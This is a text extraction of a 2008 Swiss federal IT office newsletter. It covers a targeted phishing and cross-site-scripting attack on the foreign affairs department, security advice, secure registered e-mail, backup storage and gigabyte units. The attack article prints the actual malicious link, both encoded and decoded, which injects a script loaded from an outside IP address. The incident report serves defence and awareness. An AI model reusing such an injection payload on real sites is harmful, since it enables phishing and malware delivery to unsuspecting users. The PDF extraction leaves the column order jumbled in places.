Information Web 2.0 - Bundesamt für Informatik und

Transcrição

Information Web 2.0 - Bundesamt für Informatik und
www.bit.admin.ch
Eisbrecher
Die Kundenzeitung des BIT
Nr. 30 | Juli 2008
Web 2.0:
Eine kurze Geschichte
seiner Entwicklung
Seite 15
IT-Sicherheit:
E-Mail-Attacke
auf das EDA
Seite 4
GPS:
Satelliten weisen
den Weg
Seite 13
Industrie
Information Information
Web 1.0 Web
Schweizerische Eidgenossenschaft
Confédération suisse
Confederazione Svizzera
Confederaziun svizra
1.0 Web 2.0 Web 2.0
Web 3.0
Web 3.0
Web 4.0 Web 4.0
Eidgenössisches Finanzdepartement EFD
Département fédéral des finances DFF
Bundesamt für Informatik und Telekommunikation BIT
Office fédéral de l'informatique et de la télécommunication OFIT
2
Inhalt
Web 2.0:
Eine kurze Geschichte
seiner Entwicklung
Seite 15
Editorial
3
IT-Thema
4
IT-Sicherheit: Im Posteingang lauert Ungemach
7
Interview: «Vorsicht bei HTML-Mails»
Produkte und Projekte
8
IncaMail: Eingeschrieben und sicher
9
Storage: Bundesverwaltung speichert sicher
12
Hardware-Recycling: IT-Altmaterial verkauft sich gut
IT-Sicherheit:
E-Mail-Attacke
auf das EDA
Seite 4
Eingeschoben
13
GPS und Co.: Orientierung total
15
Web 2.0: Eine vernetzte Geschichte
Events
17
PR-Leute bloggen im BIT
18
«BIT in Action»: Infos aus erster Hand
Bits & Bytes
20
FAQ; Kurz notiert
21
Kurz gelesen; Trendreport
22
SMS-Interview
23
Mixed Pixels; BIT-Kontakt-Box
GPS:
Satelliten weisen
den Weg
Seite 13
Herausgeber
Bundesamt für Informatik und Telekommunikation (BIT)
Monbijoustrasse 74, CH-3003 Bern
Telefon +41 31 325 90 11
Intranet: http://intranet.bit.admin.ch
Internet: www.bit.admin.ch
Redaktionsleitung
Nora Kelemen
Der Heftumschlag zeigt die
Ko-Evolution von Mensch
und Computer. Mehr
darüber ab Seite 15.
Redaktion
Leo Hauser (HL), Ernst Schlumpf (SErn), Marc Bärtschi
(MB). Redaktionelle Mitarbeit an dieser Ausgabe: Jose
Klee (KlJ)
Gestaltung
Stefan Flükiger (Flu)
Druck
BBL, Vertrieb Publikationen, Bern
Online-Version und Abonnement
www.bit.admin.ch/eisbrecher
Kontakt
[email protected]
Tel.: +41 31 323 38 47
Nächste Ausgabe
September 2008
EDITORIAL
3
Ihre Mitmach-Zeitung
Liebe Leserin, lieber Leser
Nora Kelemen
Bereichsleiterin Kundenkommunikation
031 323 38 47
Web 2.0 ist das Mitmach-Web. Tauchen Sie mit
uns darin ein! Das Spektrum der Inhalte, welche
von Webnutzern für ihresgleichen zusammengetragen wurden, ist immens. Wikipedia, YouTube
und Flickr sind dabei die bekannteren Sites. Um
Ihnen das Eintauchen zu erleichtern, geht der
«Eisbrecher» online. Auf www.bit.admin.ch/
eisbrecher finden Sie eine nach Nutzungsgesichtspunkten gruppierte Linkliste (Wissen, Tools,
Social networking, Sharing, Design it yourself,
Food & Beverage, Community, Reisen, Podcasting, Fotos & Videos, Nachrichten). Für moderne
Zeitgenossen gehört solch ein Tauchgang fast
schon zur, zugegeben vergnüglichen Pflicht.
Unser Lieblingslink ist übrigens die «Web Trend
Map». Ein bisschen Zeit erfordert das Betrachten
dieser Karte schon, doch es lohnt sich, denn sie
gibt Übersicht, zeigt Zusammenhänge und ist
darüber hinaus auch ein echter Augenschmaus.
In dieser Ausgabe erzählt der «Eisbrecher» die
Geschichte vom Urmenschen, der zum WebSurfer mutierte. Wir erlauben uns dabei einen
spielerischen Umgang mit dem trendigen Webjargon und wagen einen Ausblick auf Web 4.0
(Seite 15).
Wasser, wird es uns an der Wasserkante wie
geknickt erscheinen. Der Teil unterhalb der Wasserkante wird grösser aussehen, als derjenige
oberhalb. Unser Auge sieht unter Wasser alles
ungefähr um ein Viertel näher. Nun haben Sie
möglicherweise in der «Computerworld» den
interessanten Artikel «Die Bundesverwaltung
speichert sicher» gelesen (falls nicht: Wir drucken
ihn in diesem «Eisbrecher» nochmals ab). Können Sie aber auch die kniffligste aller Alltagsfragen zum Thema Speichern beantworten: Warum
zeigt der Computer bei einem DVD-Rohling mit
4.7 GB Speicherplatz bloss 4.38 GB an? Der
«Eisbrecher» bringt uns die Sache näher und gibt
Antwort. Ab Seite 9.
Gegen Ende des Tauchgangs informiert Sie Ihr
GPS zuverlässig, welche Koralle Sie sich unbedingt noch anschauen sollten und welche Strömung Sie schliesslich sicher nach Hause führt.
Der «Eisbrecher» erklärt, wie GPS funktioniert,
was man mit GPS-Handys alles finden kann
und was ein Ortungssystem auf WLAN-Basis in
Zukunft alles bringen könnte (Seite 13).
Eine vergnügliche Lektüre wünschen
Am schönsten ist es beim Tauchen, wenn man
diesen ganz speziellen Schwebezustand erreicht:
es ist ganz still, man ist entspannt und völlig
ausgeglichen. In diesem ausbalancierten Zustand
halten sich der eigene Auftrieb und die eigene
Gewichtsverdrängung exakt die Waage. Leider
ist dieses Austarieren gar nicht so einfach, zu
leicht gerät die Balance ins Wanken. Das kann
auch im Mitmach-Web geschehen. Ein harmlos
erscheinender Aufruf an EDA-Mitarbeitende zur
Beteiligung an einem Online-Foto-Wettbewerb
entpuppte sich bald als Hacker-Angriff. Wie dann
alles wieder ins Lot gebracht wurde und mit was
für Angriffen potenziell noch zu rechnen ist,
erfahren Sie ab Seite 4.
Unter Wasser erscheint uns alles viel näher, was
ein simples Experiment mit einem Wasserglas
belegt. Taucht man ein Cocktail-Stäbchen ins
Nora Kelemen und das «Eisbrecher»-Team
P.S.: Den «Eisbrecher» gibt’s auch als PDF-Download, nur für den Fall, dass Sie gar nicht mehr
aus dem Web 2.0 auftauchen mögen. Siehe
www.bit.admin.ch/eisbrecher.
IT-Thema
4
IT-Sicherheit
Im Posteingang lauert Ungemach
Hacker führten im vergangenen November eine gezielte Virus-Attacke gegen das EDA durch, wohl mit dem Ziel an vertrauliche
Informationen zu gelangen. Dank sofortiger Hinweise von aufmerksamen Mitarbeitenden ist der Angriff glimpflich abgelaufen. Doch
ohne Zweifel wird es weitere Versuche geben, die Bundes-IT zu
schädigen.
BIT-Kontakt:
Stefan Neuenschwander,
Informatiksicherheitsbeauftragter
031 322 06 17
Text: Leo Hauser
Foto: Leo Hauser,
Stefan Flükiger
Böse «Käfer» gelangen heute nicht mehr so oft direkt als E-Mail-Attachment auf den Rechner. Dafür
landen im Posteingang zunehmend E-Mails mit Links zu Webseiten, die Schadsoftware enthalten.
Es begann unverfänglich mit einer Einladung an
über 500 Mitarbeitende im EDA. Die persönlich
adressierten E-Mails trugen das vertraute Logo
der Schweizerischen Eidgenossenschaft und riefen zur Teilnahme an einem Foto-Rating auf: Auf
einer Webseite des Staatssekretariats für Wirtschaft (SECO) sollten die besten Einsendungen
eines Amateur-Fotowettbewerbs unter Bundesmitarbeitenden bewertet und der Sieger oder die
Siegerin erkoren werden – eine Art unverdächtiges Mitmachweb. Wer seine Stimme abgeben
wollte und den angegebenen Link in der E-Mail
anklickte, glaubte die Wettbewerbs-Webseite des
SECO vor sich zu haben. Was die Besucherinnen
und Besucher jedoch nicht wissen konnten: Die
SECO-Seite war gefälscht! Wollte man sich die
vermeintlichen Fotos genauer ansehen, lud man
sich nichts ahnend eine Schadsoftware auf den
Rechner. Selbstverständlich war auch der Absender gefälscht: Um bei den Empfängern der E-Mail
Vertrauen zu erwecken, gaben die Hacker als
Absender eine (existierende) E-Mail-Adresse des
Schweizer Tourismus-Verbandes vor.
Raffinierte Hacker-Technik
Aus technischer Sicht handelte es sich bei dem
Angriff auf das EDA um ein so genanntes CrossSite-Scripting, kurz XSS. Darunter versteht man
IT-Thema
5
das Ausnutzen gewisser Sicherheitslücken auf
einer Website, um dort über einen manipulierten Link einen eigenen Javascript-Code einzuschleusen, der dann auf dem Gerät des Opfers
ausgeführt wird. Der Angreifer erhält dadurch
die Möglichkeit, eigene Webseiteninhalte anzeigen zu lassen, während es für den Benutzer so
aussieht, als befände er sich nach wie vor auf der
Originalseite. Damit eine derartige Webseiten-Mimikry funktioniert, muss der User dazu gebracht
werden, die entsprechende URL zu besuchen.
Dies gelingt oft mittels eines Lockvogel-E-Mails
wie jenem an die EDA-Mitarbeitenden. Solche
E-Mails sind in aller Regel HTML-formatiert, weil
sich dadurch die Manipulation am Link problemlos verschleiern lässt.
Der XSS-Trick
Der verlinkte Text in der HTML-E-Mail lautete
«Uebergang zur web-seite zur Stimmabgabe»
(sic!). Dahinter verbarg sich folgender Link:
http://www.admin.ch/ch/script/printme.php?u
h=1339E2D660B3135B:1775C445C06C1713&de=
1DEC54A5&site=%3C%73%63%72%69%70%7
4%20%73%72%63%3D%68%74%74%70%3A
%2F%2F%31%39%36%2E%34%36%2E%31%
30%36%2E%37%31%2F%77%65%74%74%2E
%6A%73%33C%2F%73%63%72%69%70%74
%3E&_lang=de
Obiger Zahlensalat im Klartext ausgedrückt:
(...) <script src=http://196.46.106.71/wett.js>
Im vorliegenden Fall wurde eine damals noch
fehlende Inputvalidierung auf einer Website der
Bundesverwaltung ausgenutzt, um das CrossSite-Scripting durchzuführen und die User auf
eine gefälschte SECO-Webseite umzuleiten. Die
gefälschten SECO-Inhalte wurden im Kontext
von www.admin.ch dargestellt, das einzige Element, das effektiv von admin.ch gebraucht, bzw.
missbraucht wurde, war jedoch das PHP-Skript
«Printme», welches eine Druckversion der jeweiligen Seite generiert (siehe Kasten). Admin.ch
wurde also nur als «Reflektor» für die gefälschte
SECO-Seite benutzt – ein Hauptmerkmal des
Cross-Site-Scriptings. Durch diesen Kniff bleibt
sogar die Adresszeile im Browser vertrauenswürdig (beginnend mit «www.admin.ch»).
Français
Verräterische Schreibfehler
Wie die Analyse des EDA-Vorfalls zeigte, verweist der Link in der E-Mail auf das verwundbare
«Printme»-Skript und löste dort ein Cross-SiteScripting aus. Dadurch wurde eine JavascriptDatei von einem Server im ostafrikanischen Tansania heruntergeladen. Dieses Skript – es wurde
sofort nach dem Angriff XSS-untauglich gemacht
– stellte dann die gefälschte SECO-Site dar. Der
</script> (...)
Der Link bedeutet: Wenn die Seite aufgerufen
wird, hole ein Javascript von der Seite
196.46.106.71 mit dem Namen wett.js.
auf der Webseite verlinkte Virus wiederum war
auf einem Server in Beirut (Libanon) abgelegt.
Die Malware tarnte sich als funktionierender Bildschirmschoner, dem die Hacker sogar ein ansprechendes Icon mit Schweizerkreuzchen verpasst
hatten. Einmal aktiviert, zeigt der Screensaver
Bilder des vermeintlichen Fotowettbewerbs. Im
Hintergrund jedoch legte die Schadsoftware auf
dem Rechner verschiedene Tasks an, welche sich
bei jedem künftigen Logon des Benutzers aktiviert hätten. Die entsprechenden Files, die das
Virus auf dem PC platzierte, waren geschützt, für
den Benutzer unsichtbar und enthielten die Möglichkeit, mit verschiedenen externen Servern zu
kommunizieren, von dort neue Schadsoftware zu
laden oder dorthin gesammelte Informationen zu
übermitteln. Der Angriff hatte sehr wahrscheinlich das Ziel, an vertrauliche Informationen wie
z.B. Passwörter zu gelangen.
Menaces sur la boîte de réception
En novembre dernier, des pirates ont lancé une attaque de virus ciblée contre le DFAE dans le but de soutirer des informations confidentielles. Grâce à la réaction immédiate de collaborateurs attentifs, l’attaque n’a pas atteint son but. Mais ce
n’était certainement pas la dernière tentative de piratage contre le réseau informatique de la Confédération. Vous trouverez la version française de cet article sous www.bit.admin.ch/eisbrecher
IT-Thema
6
Die Anlage des Angriffs auf das EDA war raffiniert genug, dass etwa 70 Mitarbeitende sich
dazu verleiten liessen, beim angeblichen BilderRating mitzumachen – wodurch sich das Virus
auf ihren PCs einnisten konnte. Einigen Mitarbeitenden kamen jedoch zu Recht die holprigen
Formulierungen und die vielen Schreibfehler in
der Einladungs-E-Mail und auf der WettbewerbsWebseite suspekt vor. So war unter anderem
von eidgenössischen «Zivilbeamten» die Rede,
ein Begriff, der in der Bundesverwaltung nicht
gebräuchlich ist. Auch hatten die Verfasser der
Texte offenbar keine Tastatur mit Umlauten zur
Verfügung. Dank der umgehenden Meldung
beim HelpDesk des EDA konnten die IT-Spezialisten rasch intervenieren und dadurch grösseren
Schaden verhindern. Die ca. 70 verseuchten
Geräte konnten rasch identifiziert werden. Sie
wurden gesperrt und neu aufgesetzt. Alle betroffenen Anwenderinnen und Anwender mussten
ihre Passwörter ändern. Doch der nächste Angriff
kommt bestimmt (siehe auch nebenstehendes
Interview): Gemäss der Melde- und Analysestelle
Informationssicherung MELANI (www.melani.
admin.ch) lässt die aufwändige Art des Angriffs
aufs EDA auf eine professionelle und mit einigen
finanziellen und technischen Mitteln ausgestattete Täterschaft schliessen.
Screenshot der
gefälschten
SECO-Website. Die
gesamte Site
wurde mittels
JavaScript von
einem Server in
Tansania geladen.
Mit einem Klick auf
«Schauen» lud
man sich nichts
ahnend die
Malware herunter.
Das Design der Site
entspricht dem
Corporate Design
des Bundes,
verdächtig sind
jedoch die zahlreichen sprachlichen Schnitzer im
Text.
IT-Thema
7
«Vorsicht bei HTML-Mails»
Reto Inversini, Informationssystem-Architekt/
Security im BIT, über gefährliche Mails und Webseiten.
Eisbrecher: Kommen Angriffe auf die Bundes-IT häufig vor?
Reto Inversini: Angriffe werden immer gezielter
durchgeführt und haben neben Informationsbeschaffung vor allem wirtschaftliche Ziele. Grosse
Virenausbrüche mit dem Ziel, die Verfügbarkeit
einzuschränken, kommen kaum mehr vor. Stattdessen zielen die Angriffe darauf ab, möglichst
unbemerkt die Kontrolle über ein Gerät zu übernehmen.
Mit welchem konkreten Ziel?
Dabei gibt es folgende drei Hauptbereiche:
• Informationsgewinnung (das geht von Passwörtern über Keylogger bis hin zum Abfluss
von Firmengeheimnissen sowie Spionagetätigkeit)
• Identitätsdiebstahl
• Botnetze: Übernommene Geräte werden
häufig in ein sogenanntes Botnetz eingereiht.
Diese riesigen Verbünde von gekaperten Rechnern – oft mehrere 100 000 Geräte, selten
auch mehrere Millionen – werden v.a. für den
Versand von Spam- und Phishing-Mails, seltener für DDoS-Angriffe verwendet. (Unter DDoS
– Distributed Denial of Service – versteht man
einen Angriff auf einen Computer mit dem
Ziel, seine Verfügbarkeit zu stören. Im Gegensatz zur DoS-Attacke erfolgt der Angriff von
vielen verteilten Rechnern aus. Anm. d. Red.)
Woran erkennt man ein potenziell gefährliches E-Mail?
Insbesondere Mails in HTML-Format sind mit Vorsicht zu geniessen, das Beispiel des EDA illustriert
dies sehr gut. Mails aus unbekannter Quelle sind
grundsätzlich mit Shift-Delete direkt zu löschen.
Es ist im Grundsatz auch möglich, ein Mail mit
admin.ch-Absender zu fälschen und ins Bundesnetz zu senden. Prinzipiell sollte man sich bei
jedem Mail kurz überlegen, ob man es erwartet
hat und ob der Stil des Schreibenden mit dem
erwarteten Stil übereinstimmt.
Darf man Links in E-Mails anklicken?
Nein, das sollte man nicht tun, ausser man ist
sehr sicher, dass das Mail effektiv von der rich-
tigen Person stammt, z.B. weil es eine gültige
SecureMail-Signatur hat. Reine Textmails sind
weniger riskant, weil man dort den gesamten
Link sieht. In einem HTML-Mail wird der Link
aber unter dem Text verborgen (z.B. «Hier klicken
für die BIT-Homepage» ist der Name des Links,
darunter verbirgt sich jedoch eine x-beliebige
URL, z.B. http://badwebsite.com). Es ist immer
besser, einen Link abzutippen oder aus den eigenen Bookmarks zu nehmen.
Wie soll man sich verhalten, wenn man eine
verdächtige E-Mail erhalten hat?
Wenn das Mail keinen Bezug zur Bundesverwaltung hat, löschen Sie es einfach mit Shift-Delete.
Wenn das Mail einen Bezug zur Bundesverwaltung oder zu Ihnen als Person vorzuspielen versucht, informieren Sie Ihren Informationssicherheitsbeauftragten (ISBO), speichern Sie das Mail
und leiten es danach als Attachment an [email protected] weiter.
Was ist zu tun, wenn man den Hackern auf
den Leim gekrochen ist und sich eine Malware eingefangen hat?
Ziehen Sie das Netzwerkkabel aus Ihrem Computer und informieren Sie das Service Desk BIT,
bzw. den Helpdesk Ihrer Organisation.
Wo lauert sonst noch im Internet Malware?
Malware wird nicht nur per Mail verteilt, sondern
immer häufiger auch direkt via Web, z.B. durch
bösartige Werbebanner. Immer öfter werden
Links auf bösartige Seiten oder Dateien via Instant Messaging zum Benutzer gebracht. Wenn
Malware per Mail verteilt wird, ist es sehr oft
so, dass nur noch ein Link auf die Site mit der
Malware im Mail enthalten ist. Bösartige Dateianhänge werden immer seltener, existieren aber
nach wie vor.
Keine Schonung für Screensaver
Als Massnahme bezüglich des Auftretens von
virenverseuchten Bildschirmschonern hat das
BIT den Download von Dokumenten mit der
Endung .scr (Screensaver) via Webbrowser
gesperrt. Diese Filetypen waren auf den
Mailservern des Bundes (Outlook, E-Mail)
bereits seit Mitte 2004 blockiert. Details:
www.ais.admin.ch
Produkte & Projekte
8
Elektronisches Einschreiben
IncaMail: Eingeschrieben und sicher
Inca? Die Ähnlichkeit ist wohl mehr zufällig als gewollt, denn dieses
Inca hat weder mit dem berühmten Inca Kaffee noch mit einer
Gemeinde auf Mallorca noch mit einem Volk der Anden irgend etwas
gemein. Inca, zusammen mit Mail, bezeichnet eine Dienstleistung
der Post.
Wie viele IT-Bezeichnungen ist auch dieser Begriff
Inca ein Kürzel, welches sich aus den vier englischsprachigen, aber durchaus gebräuchlichen
Begriffen Integrity (Integrität), Non-repudiability
(Nichtabstreitbarkeit), Confidentiality (Vertraulichkeit) und Authenticity (Authentizität) zusammensetzt. In Kombination mit dem Begriff Mail ergibt
das dann IncaMail. Sinn und Zweck dieser zeitgemässen und leicht handhabbaren Anwendung:
Mails können elektronisch eingeschrieben werden, der Dokumentenverkehr wird damit sicher,
nachweisbar und vor allem auch rechtsgültig.
BIT-Kontakt:
Peter Balsiger,
Abteilungsleiter
E-Government
031 325 40 43
Text: Ernst Schlumpf
«Safety first»
Obwohl immer mehr Dokumente elektronisch
versandt werden, ist der heutige Mailverkehr
immer noch alles andere als sicher. Das gibt zu
denken und ruft die Sicherheitsleute auf den
Plan, welche den Auftrag haben, im Sinne der
Kunden für sichere Übertragungswege zu sorgen. In diesem Kontext hat die Schweizerische
Post in Zusammenarbeit mit dem BIT IncaMail
entwickelt, eine Lösung mit welcher Verträge,
sensible Kundendaten, Kündigungen, Gesundheitsdaten und alle anderen Daten und Dokumente schneller, sicherer und preiswerter verQuittung
schickt werden können als auf dem physischen
Weg. Voraussetzung für ein funktionierendes
IncaMail sind Zertifikate, Client-Applikationen
und ein IncaMail-Account für Sender und Empfänger. Dank der vom BIT betriebenen Public
Key Infrastructure (Admin PKI), welche die entsprechenden Zertifikate zur Verfügung stellt, ist
eine hochwertige, elektronische Kommunikation
garantiert.
IncaMail in der Praxis
In der praktischen Anwendung wird eine Nachricht (mit allfälligen Begleitdokumenten) automatisch mit dem Zertifikat des Absenders signiert
und mit dem Schlüssel des Empfängers verschlüsselt. Die Nachricht geht via Internet an die
IncaMail-Plattform der Post und legt sich dort ins
Postfach des Empfängers. Der Post-Server informiert den Empfänger über die Sendung. Dieser
Adressat ist der einzige, der authorisiert ist, die
Nachricht zu entschlüsseln. Sie muss zudem
innerhalb einer präzise definierten Frist abgeholt sein. Holt der Adressat sie nicht ab, wird sie
gelöscht und Absender und Empfänger werden
informiert. Holt er sie ab, wird die Datei geprüft
und beim Download automatisch entschlüsselt.
Eine Quittung bestätigt diesen gesamten Prozess
und macht ihn damit sauber nachvollziehbar
und für die registrierten Inhaber der IncaMailAccounts rechtlich verbindlich.
Links
Abhol-Frist
Die Produktwebsite der Schweizerischen Post für
den sicheren Austausch von elektonischen Daten
www.incamail.ch
Informationen zur Admin PKI
http://intranet.bit.admin.ch/adminpki
ho
Informations-Mail
lu n
g
Empfänger
Ve
rs a
nd
Ab
[inca] Mail
Informations-Mail
Sender
Versand-Datum
Abhol-Datum
Lösch-Datum
t
Produkte & Projekte
9
Storage
Bundesverwaltung speichert sicher
Die enorme Zunahme unstrukturierter Daten erschwerte beim BIT
die Datensicherung. Mit der Einführung einer neuen Backup-Software ist das BIT nun wieder auf der sicheren Seite.
Artikel aus der Zeitschrift «Computerworld» Nr. 13/2008. Abdruck mit
freundlicher Genehmigung der Redaktion.
BIT-Kontakt:
Stefan Kälin,
Bereichsleiter Storage
031 325 93 18
Text: Claudia Bardola
(«Computerworld»)
Foto: Leo Hauser
Die steigende Datenflut in Unternehmen und
Organisation wird heute vor allem durch unstrukturierte Daten verursacht: Mittlerweile liegt nicht
einmal die Hälfte aller Daten in strukturierter
Form in Datenbanken und Geschäftsapplikationen vor. Der Rest verteilt sich grösstenteils
unstrukturiert auf E-Mail- und MessagingSysteme und Office-Dateien. Diese Entwicklung
bereitete auch Stefan Kälin, Bereichsleiter Storage beim BIT, zunehmend Kopfzerbrechen. «Die
Zunahme unstrukturierter Daten gestaltete sich
dramatisch. Dabei machte uns aber weniger der
Speicherplatz als vielmehr die Datensicherung
Sorgen.»
So reichte das für das Backup angelegte Zeitfenster am Wochenende kaum noch aus. Zudem
waren es auch die Backup-Kosten, die Kälin
nachdenklich werden liessen: Teurer Primärspeicher wurde durch die redundante Ablage von
Daten, insbesondere von E-Mail-Anhängen,
belegt. Der installierte Speicherplatz beim BIT
beträgt mehr als 511 Terabyte. Monatlich kommt
im Schnitt mehr als 1 Terabyte (1 Terabyte = 1
Million Megabyte) hinzu.
Für Kälin stand fest, dass die bestehende
Datensicherungs-Software den Anforderungen
nicht länger würde genügen können und daher
dringend abgelöst werden musste. Mit
seinem Team schrieb er das Projekt gemäss
den Vorgaben der Welthandelsorganisation
(WTO) aus. Die sorgfältige Evaluation der
Angebote führte zu einer Shortlist von drei
Anbietern. Bei der Entscheidungsfindung
hatte sich die Crew bewusst Zeit genommen: Von jedem Tool wurde eine Test-installation aufgesetzt, die während eines Jahres
gründlich geprüft wurde.
«Die Produkte lagen dicht beieinander»,
erinnert sich Kälin. Am Ende erhielt Veritas
NetBackup von Symantec den Zuschlag.
Zwei Gründe waren entscheidend: NetBackup kam besser mit heterogenen Umgebungen und der dadurch notwendigen
Unterstützung unterschiedlicher Betriebssystemderivate zurecht. Zudem punktete die
Software mit umfangreicher Funktionalität.
Français
Hat den Durchblick: Stefan Kälin, Bereichsleiter Storage. Jede einzelne «Kassette»
dieser Tape Library im BIT-Rechenzentrum fasst 1,5 Terabyte an Daten.
Heterogene Infrastruktur
Vor allem die Unterstützung heterogener
Umgebungen war wichtig. Denn grundsätzlich sieht das Konzept des BIT drei
Stockage des données: l’administration fédérale assure
La sauvegarde des données à l’OFIT devenait difficile en raison de la croissance énorme des données non structurées. Avec
l’introduction d’un nouveau logiciel de backup, l’OFIT peut à nouveau stocker les données en toute sécurité. Vous trouverez
la version française de cet article sous www.bit.admin.ch/eisbrecher
Produkte & Projekte
10
Reis
Speicher-Systeme
0
1 Bit
1 Reiskorn
0010 0000
1Byte
8 Reiskörner
5 KB
Standorte für die Rechenzentren vor: Das Hauptrechenzentrum im so genannten «Titanic II»Gebäude in Bern, ein Backup-Rechenzentrum in
knapp fünf Kilometer Entfernung sowie ein militärisch geschützter Disaster-Recovery-Standort,
der etwa 100 km entfernt ist. Alle Standorte sind
über redundante Höchstgeschwindigkeitsleitungen miteinander verbunden.
1.2 kg
Das aktuelle Konzept hat seinen Ursprung in der
Entscheidung des Bundes aus dem Jahr 2000, die
Anzahl der damals 75 Informatikabteilungen auf
Departementsstufe auf sieben zu konsolidieren.
«Damit», erinnert sich Stefan Kälin, «bekamen
wir ganz unterschiedliche Systemarchitekturen
ins Haus, angefangen bei den Betriebssystemderivaten bis hin zu den Speichersystemen.» Davon
ist heute nicht mehr viel übrig. Die Standardisierung aller Komponenten wurde und wird konsequent vorangetrieben. Die Integrationsaufgaben
durch das Insourcing der Departemente umfasste
auch die Backup-Software.
2 Reispackungen à 600 g
5 MB
1.2 t
Musiksong mp3
40 Reissäcke à 30kg
750 MB
180 t
CD
3.7 Schiffscontainer à 2.44 x 2.59 x 12.2m
1 GB
240 t
Memorystick
4.9 Schiffscontainer à 2.44 x 2.59 x 12.2m
100 GB
489 x
24‘000 t
1 TB
240‘000 t
Frachtschiff mit 4899 Containern
Externe Harddisk
300 TB
Zentrales Disk-Speichersystem
72 Mt
300 Frachtschiffe mit 1‘469‘822 Containern
Der Reisrechner
Ein König wollte den Erfinder des Schachbretts entlohnen und fragte nach seinem Wunsch. Der weise Brahmane antwortete: «Ich wünsche mir ein Reiskorn
auf das erste Spielfeld und auf jedes folgende Feld immer die doppelte Anzahl
Reiskörner des vorhergehenden Feldes. Der König willigte ein – und musste
bald die Unerfüllbarkeit dieses Wunsches einsehen. Es hätte 18 446 744 073
709 551 615 Reiskörner gebraucht: 553 Gigatonnen Reis! Wie die Reiskörner
auf dem Schachbrett nimmt auch die Datenmenge stetig zu, wie der «Reisrechner» veranschaulicht: Entspricht ein Bit (kleinste darstellbare Datenmenge)
einem Reiskorn, so entspricht bereits der Inhalt einer einzigen CD dem Inhalt
von 3 Schiffscontainern.
Idee und Kreation: Musqueteers GmbH - Kompanie für Kommunikation für Hitachi Data Systems AG
Schiffscontainer à 2.44 x 2.59 x 12.2m
Laptop
Elegantes Backup
Die Speicherinfrastruktur des BIT ist vollkommen
symmetrisch aufgebaut. Primär- und Sekundärstandort sind über eine DWDM-Verbindung
gekoppelt (DWDM = Dense Wavelength Division
Multiplexing; ermöglicht Netze mit extrem hoher
Übertragungskapazität). Als Backup sind beide
Standorte zudem mit einem Gigabit-IP-Backbone
verbunden. Die veränderten Daten werden
gleichzeitig an beiden Standorten auf identische Tape Libraries geschrieben. «Das erledigt
NetBackup nun sehr elegant», ist Stefan Kälin
zufrieden.
In dieses Sicherungskonzept sind auch alle Daten
von Applikationen eingeschlossen, für die ein
erhöhter Schutzbedarf im Projekt Katastrophenvorsorge für die Bundesverwaltung definiert
wurde. Dazu gehören beispielsweise die E-Mails.
Diese Daten werden mehrfach am Tag über das
Gigabit-Netz vom Primärstandort an den Sekundärstandort gespiegelt und von dort aus auf
Band gesichert.
NetBackup macht täglich eine inkrementelle
Datensicherung (auch Zuwachssicherung
genannt) der am selben Tag geänderten Daten.
Diese Sicherungsbänder bleiben sieben Tage
erhalten, bevor sie wieder überschrieben werden.
Wöchentlich findet eine Vollsicherung statt, die
drei Wochen aufbewahrt wird. Dazu kommt eine
monatliche Vollsicherung, die erst nach 90 Tagen
wieder überschrieben werden darf. «Dies sind
Produkte & Projekte
11
die Standardfälle», erklärt Stefan Kälin. «Andere
Sicherungszyklen lassen sich mit NetBackup
natürlich ohne Problem einrichten. Das liegt allein
an den Anforderungen unserer Kunden.»
Wie viele Bytes sind ein Gigabyte?
Man kennt das: Auf der Verpackung verspricht die
externe Festplatte ein Fassungsvermögen von 500
Gigabytes (GB), doch nach dem Kauf meldet das
Betriebssystem des PCs bloss deren 466. Dasselbe beim
Clevere Speicherhierarchien
Das Problem mit der redundanten Datenspeicherung auf teuren Primärspeichern hat Kälin ebenfalls gelöst. Es kommt nun eine ILM-Strategie
(ILM = Information Lifecycle Management) zum
Tragen, nach der Daten ihrer Bedeutung gemäss
auf das jeweils geeignete Speichermedium verschoben werden. Daten älter als beispielsweise
drei Monate werden automatisch auf billigen
Speicher übertragen. «Wir haben eine Speicherhierarchie aus High-end-, Mid-range- und
Low-cost-Systemen eingerichtet», sagt Kälin. «Im
Low-cost-Bereich streben wir Kosten von 10 Rappen pro Gigabyte und Monat an.» Dank dieser
Speicherhierarchie verkleinert sich das BackupVolumen deutlich.
DVD-Rohling mit seinen angeblichen 4,7 GB Speichervermögen: Legt man den Rohling ins Laufwerk zeigt der PC
plötzlich nur noch 4,38 GB an. Eine Mogelpackung?
Die Erklärung: Hersteller von Speicherplatten und
DVD-Rohlingen zählen auf andere Weise als der
Computer – und das zu Recht. Denn gemäss Système
international d’unités (SI) sind die Präfixe Kilo, Mega, Giga
etc. für dezimale Vielfache reserviert. Nach den
international anerkannten SI-Regeln entspricht ein
Kilobyte (KB) also hochoffiziell 1000 (103) Bytes und ein
Megabyte (MB) exakt einer Million (106) Bytes. Und die
Hersteller von Festplatten, DVD- und Blu-ray-Disc-Rohlingen tun nichts anderes, als die Präfixe regelkonform zu
verwenden. Nicht so der PC: Der rechnet seit eh und je
mit binären Vielfachen: Ein KB entspricht für ihn 1024
(210) Bytes, ein MB 1 048 576 (220) Bytes usw.
Das BIT hat heute für die Datensicherung mehrere Tape Libraries im Einsatz. «Die PetabyteGrenze (1 Petabyte = 1000 Terabyte, Red.) haben
wir längst überschritten», so Stefan Kälin. Auch
optische Speichersysteme sind derzeit noch im
Einsatz, werden jedoch schon bald durch DiskArchive abgelöst. «Für Archivzwecke sind Disks
grundsätzlich gut geeignet», sagt der BIT-Bereichsleiter. «Als Back-up-Medien finden wir sie
weniger brauchbar. Das Tape wird uns hier noch
lange als preisgünstiges und flexibles Medium
erhalten bleiben, vor allem mit den künftigen
2-Terabyte-Kassetten.» Daher steht das BIT-Team
dem Konzept der Virtual Tape Library, also DiskSystemen, die sich wie Tapes ansprechen lassen,
noch skeptisch gegenüber. Bevor dies in Angriff
genommen wird, soll zunächst einmal die volle
Funktionalität von NetBackup ausgenutzt werden.
In der binären Welt des Computers ist es also in etwa so,
wie wenn man eine bestimmte Menge Wasser nicht in
standardisierte 1-Liter-Krüge, sondern sie in etwas
grössere Krüge abfüllen würde: Das Wasser fände in
weniger Krügen Platz. Gleichermassen passen die 500
Milliarden Bytes auf der 500-GB-Festplatte locker in 466
der etwas grösseren «binären Gigabytes» des Computers.
Nun, dieses mega Durcheinander müsste nicht sein,
verwendete man nur die richtigen Einheiten – die Präfixe
Kilo, Mega, Giga usw. also ausschliesslich für dezimale
Vielfache. Für binäre Vielfache existieren nämlich eigene
Präfixe, die sich in der Praxis aber noch nicht durchgesetzt
haben: Sie heissen Kibi (Ki), Mebi (Mi), Gibi (Gi) usw.,
